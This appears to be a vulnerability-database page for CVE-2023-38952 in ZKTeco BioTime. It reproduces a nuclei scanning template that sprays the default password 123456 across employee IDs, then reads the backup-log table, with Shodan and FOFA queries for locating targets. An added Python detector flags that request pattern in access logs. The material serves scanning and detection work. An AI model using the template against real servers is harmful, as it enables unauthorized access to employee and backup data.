ZKTeco BioTime <= 9.0.1 - Privilege Escalation

Reported by ProjectDiscovery, 03 Jul 2026 13:39:16
Type: nuclei
Source: github.com

BioTime default password 123456 allows privilege escalation and access to admin actions and backup files.

Code
id: CVE-2023-38952

info:
  name: ZKTeco BioTime <= 9.0.1 - Privilege Escalation
  author: riteshs4hu
  severity: high
  description: |
    BioTime default employee credentials (password 123456) allow login. Sessions are not role-validated, enabling privilege escalation to perform admin actions and enumerate backup files.
  impact: |
    Unauthenticated attackers can access sensitive files and credentials, leading to data breach and potential system compromise.
  remediation: |
    Implement proper authentication and access controls for static file resources, and update to the latest version if available.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-38951
    - https://krashconsulting.com/fury-of-fingers-biotime-rce/
    - https://github.com/omair2084/biotime-rce-8.5.5/blob/main/biotime_enum.py
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.3
    cve-id: CVE-2023-38952
    epss-score: 0.02438
    epss-percentile: 0.82295
    cwe-id: CWE-552
    cpe: cpe:2.3:a:zkteco:biotime:8.5.5:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: zkteco
    product: biotime
    max-request: 12
    shodan-query: http.html:"ZKTeco Security"
    fofa-query: body="ZKTeco Security"
  tags: cve,cve2023,biotime,zkteco,auth-bypass,priv-esc,vkev

http:
  - raw:
      - |
        GET /login/ HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: csrf
        group: 1
        internal: true
        part: body
        regex:
          - "name='csrfmiddlewaretoken' value='([a-zA-Z0-9]+)'"

  - raw:
      - |
        POST /login/ HTTP/1.1
        Host: {{Hostname}}
        X-CSRFToken: {{csrf}}
        Content-Type: application/x-www-form-urlencoded

        username={{user}}&password=123456&captcha=&login_user=employee

    payloads:
      user:
        - "1"
        - "2"
        - "3"
        - "4"
        - "5"
        - "6"
        - "7"
        - "8"
        - "9"
        - "10"
    attack: clusterbomb
    stop-at-first-match: true

  - raw:
      - |
        GET /base/dbbackuplog/table/?page=1&limit=1 HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "db_type\":", "backup_file\":")'
          - 'contains(content_type, "application/json")'
        condition: and
# digest: 4b0a00483046022100c7f15bbb5e7f06efc1235268b3d584d439b94cef200ace888a8e6d62ea78d5cd022100fc15707fd23c32c58d14729070cc90e3fed02c0f127ef4ca9e5f1dea0a324909:922c64590222798bb761d5b6d8e72950
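As an added defender-side example (not part of the nuclei template or the Vulners page), the following Python detector scans constructed web-server access logs for the request sequence the template above exercises: a burst of POST /login/ attempts from one client followed shortly by a read of /base/dbbackuplog/table/. The combined log format, the sample lines, and the thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Jul/2026:13:39:01 +0000] "POST /login/ HTTP/1.1" 200 512
10.0.0.5 - - [03/Jul/2026:13:39:02 +0000] "POST /login/ HTTP/1.1" 200 512
10.0.0.5 - - [03/Jul/2026:13:39:02 +0000] "POST /login/ HTTP/1.1" 200 512
10.0.0.5 - - [03/Jul/2026:13:39:03 +0000] "POST /login/ HTTP/1.1" 302 0
10.0.0.5 - - [03/Jul/2026:13:39:04 +0000] "GET /base/dbbackuplog/table/?page=1&limit=1 HTTP/1.1" 200 2048
192.168.1.20 - - [03/Jul/2026:13:40:10 +0000] "POST /login/ HTTP/1.1" 302 0
192.168.1.20 - - [03/Jul/2026:13:41:00 +0000] "GET /base/dbbackuplog/table/?page=1&limit=20 HTTP/1.1" 200 4096
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
LOGIN_PATH = "/login/"                      # endpoint the template posts default creds to
BACKUP_PATH = "/base/dbbackuplog/table/"    # endpoint the template reads after login


def parse_line(line):
    """Return (ip, timestamp, method, path-without-query) or None for unparsable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"].split("?", 1)[0]


def detect(log_text, min_logins=3, window=timedelta(seconds=60), follow=timedelta(minutes=5)):
    """One finding per client that bursts POST /login/ and then reads the backup-log table."""
    logins, backups = defaultdict(list), defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path = rec
        if method == "POST" and path == LOGIN_PATH:
            logins[ip].append(ts)
        elif method == "GET" and path == BACKUP_PATH:
            backups[ip].append(ts)
    findings = []
    for ip, times in logins.items():
        times.sort()
        for i in range(len(times) - min_logins + 1):   # sliding window over login attempts
            burst_end = times[i + min_logins - 1]
            if burst_end - times[i] <= window:
                reads = [t for t in backups.get(ip, []) if burst_end <= t <= burst_end + follow]
                if reads:
                    findings.append({"client": ip, "login_attempts": len(times),
                                     "first_backup_read": reads[0]})
                break
    return findings
```

A single successful login followed by a backup-log read (the second client above) is normal administrator behaviour and is deliberately not flagged; only the credential-spray pattern plus follow-on read is reported.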
